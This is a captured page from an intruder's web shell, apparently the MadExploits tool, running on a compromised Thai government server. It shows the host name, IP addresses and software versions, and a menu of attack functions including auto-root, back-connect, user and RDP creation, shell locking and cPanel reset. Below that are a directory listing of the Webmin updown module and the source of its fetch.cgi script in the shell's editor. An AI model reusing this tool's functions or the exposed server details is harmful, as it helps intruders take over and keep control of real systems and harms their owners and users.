Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
updown /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
876
B
-rw-r--r--
acl_security.pl
1.74
KB
-rwxr-xr-x
cancel.cgi
850
B
-rwxr-xr-x
config
34
B
-rw-r--r--
config.info.ca
376
B
-rw-r--r--
config.info.ca.UTF-8
383
B
-rw-r--r--
config.info.cz
0
B
-rw-r--r--
defaultacl
42
B
-rw-r--r--
download.cgi
4.58
KB
-rwxr-xr-x
download.pl
1.39
KB
-rwxr-xr-x
fetch.cgi
3.07
KB
-rwxr-xr-x
index.cgi
7.04
KB
-rwxr-xr-x
log_parser.pl
986
B
-rwxr-xr-x
module.info
210
B
-rw-r--r--
module.info.ca
164
B
-rw-r--r--
module.info.ca.UTF-8
180
B
-rw-r--r--
module.info.cz
26
B
-rw-r--r--
module.info.cz.UTF-8
36
B
-rw-r--r--
module.info.de
174
B
-rw-r--r--
module.info.de.UTF-8
186
B
-rw-r--r--
module.info.es
27
B
-rw-r--r--
module.info.es.UTF-8
33
B
-rw-r--r--
module.info.fi
26
B
-rw-r--r--
module.info.fi.UTF-8
33
B
-rw-r--r--
module.info.fr
34
B
-rw-r--r--
module.info.fr.UTF-8
44
B
-rw-r--r--
module.info.hu
30
B
-rw-r--r--
module.info.hu.UTF-8
38
B
-rw-r--r--
module.info.it
26
B
-rw-r--r--
module.info.it.UTF-8
32
B
-rw-r--r--
module.info.ja_JP.UTF-8
57
B
-rw-r--r--
module.info.ja_JP.euc
42
B
-rw-r--r--
module.info.ko_KR.UTF-8
40
B
-rw-r--r--
module.info.ko_KR.euc
31
B
-rw-r--r--
module.info.ms
30
B
-rw-r--r--
module.info.ms.UTF-8
36
B
-rw-r--r--
module.info.ms_MY
197
B
-rw-r--r--
module.info.ms_MY.UTF-8
209
B
-rw-r--r--
module.info.nl
31
B
-rw-r--r--
module.info.nl.UTF-8
37
B
-rw-r--r--
module.info.no
33
B
-rw-r--r--
module.info.no.UTF-8
39
B
-rw-r--r--
module.info.pl
144
B
-rw-r--r--
module.info.pl.UTF-8
159
B
-rw-r--r--
module.info.ru.UTF-8
55
B
-rw-r--r--
module.info.ru_RU
33
B
-rw-r--r--
module.info.ru_RU.UTF-8
58
B
-rw-r--r--
module.info.ru_SU
33
B
-rw-r--r--
module.info.sk
26
B
-rw-r--r--
module.info.sk.UTF-8
32
B
-rw-r--r--
module.info.tr
27
B
-rw-r--r--
module.info.zh_TW.Big5
27
B
-rw-r--r--
safeacl
28
B
-rw-r--r--
uninstall.pl
340
B
-rwxr-xr-x
updown-lib.pl
7.44
KB
-rwxr-xr-x
upload.cgi
6.42
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : fetch.cgi
#!/usr/bin/perl # Output one file for download require './updown-lib.pl'; &ReadParse(); &error_setup($text{'fetch_err'}); $can_fetch || &error($text{'fetch_ecannot'}); # Validate filename $file = $ENV{'PATH_INFO'} || $in{'fetch'}; if ($file !~ /^([a-z]:)?\// && $can_dirs[0] ne "/") { $file = "$can_dirs[0]/$file"; } $file || &error($text{'fetch_efile'}); if ($file =~ /^(.*)\.zip$/ && $in{'unzip'}) { # Remove .zip extension $file = $1; } -r $file || -d $file || &error($text{'fetch_eexists2'}); &can_write_file($file) || &error(&text('fetch_eaccess', "<tt>$file</tt>", $!)); if (-d $file && !&has_command("zip")) { &error($text{'fetch_ezip'}); } if ($file eq "/" || $file =~ /^[a-z]:\/$/) { &error($text{'fetch_eroot'}); } if ($ENV{'PATH_INFO'}) { # Switch to the correct user if ($can_mode == 3) { @uinfo = getpwnam($remote_user); &switch_uid_to($uinfo[2], $uinfo[3]); } elsif ($can_mode == 1 && @can_users == 1) { @uinfo = getpwnam($can_users[0]); &switch_uid_to($uinfo[2], $uinfo[3]); } if (-d $file) { # Zip up the whole directory ($shortfile = $file) =~ s/^.*\///g; $shortfile =~ s/\s+//g; $temp = &transname($shortfile.".zip"); $out = &backquote_command("cd ".quotemeta($file). " && zip -r ".quotemeta($temp)." ."); if ($?) { &error(&text('fetch_ezipcmd', "<tt>".&html_escape($out)."</tt>")); } @st = stat($temp); print "Content-length: $st[7]\n"; print "Content-type: application/zip\n\n"; open(FILE, $temp); unlink($temp); while(read(FILE, $buffer, 1000000)) { print("$buffer"); } close(FILE); } else { # Work out the type &open_readfile(FILE, $file) || &error(&text('fetch_eopen', $!)); if ($fetch_show) { $type = &guess_mime_type($file, undef); if (!$type) { # See if it is really text $out = &backquote_command("file ". quotemeta(&resolve_links($file))); $type = "text/plain" if ($out =~ /text|script/); } } else { print "Content-Disposition: Attachment\n"; } # Send it $type ||= "application/octet-stream"; if (!$fetch_show) { print "Content-Disposition: Attachment\n"; } @st = stat($file); print "Content-length: $st[7]\n"; print "X-Content-Type-Options: nosniff\n"; print "Content-type: $type\n\n"; while(read(FILE, $buffer, 1000000)) { print("$buffer"); } close(FILE); } # Switch back to root &switch_uid_back(); } else { # Save file in config if ($module_info{'usermin'}) { &lock_file("$user_module_config_directory/config"); $userconfig{'fetch'} = $file; $userconfig{'show'} = $in{'show'}; &write_file("$user_module_config_directory/config", \%userconfig); &unlock_file("$user_module_config_directory/config"); } else { &lock_file("$module_config_directory/config"); $config{'fetch_'.$remote_user} = $file; $config{'show_'.$remote_user} = $in{'show'}; &write_file("$module_config_directory/config", \%config); &unlock_file("$module_config_directory/config"); } # Redirect to nice URL $file =~ s/#/%23/g; if (-d $file) { &redirect("fetch.cgi".$file.".zip?unzip=1"); } else { &redirect("fetch.cgi".$file); } }
Close